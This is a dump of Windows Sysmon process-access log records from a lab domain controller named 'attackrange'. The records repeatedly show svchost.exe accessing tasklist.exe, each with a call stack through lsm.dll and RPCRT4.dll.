  26029          2021-06-23 21:10:30.770  +e9d6 | +1c24
  26028          2021-06-23 21:10:30.770  +1f3a | +1cd9
  26027          2021-06-23 21:10:30.770  +e9d6 | +1c24
  26026          2021-06-23 21:10:30.754  +1f3a | +1cd9
  26025          2021-06-23 21:10:30.754  +e9d6 | +1c24
  26024          2021-06-23 21:10:30.754  +e9d6 | +157b1
  26023          2021-06-23 21:10:30.754  +1f3a

Record 26022 (System header; its EventData continues on the next line):

10341000x800000000000000026022Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026021Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026020Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026019Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026018Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026017Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026016Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026015Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026014Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026013Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026012Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026011Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026010Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026009Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026008Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026007Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026006Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026005Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026004Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026003Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026002Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026001Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000026000Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.754{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025999Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 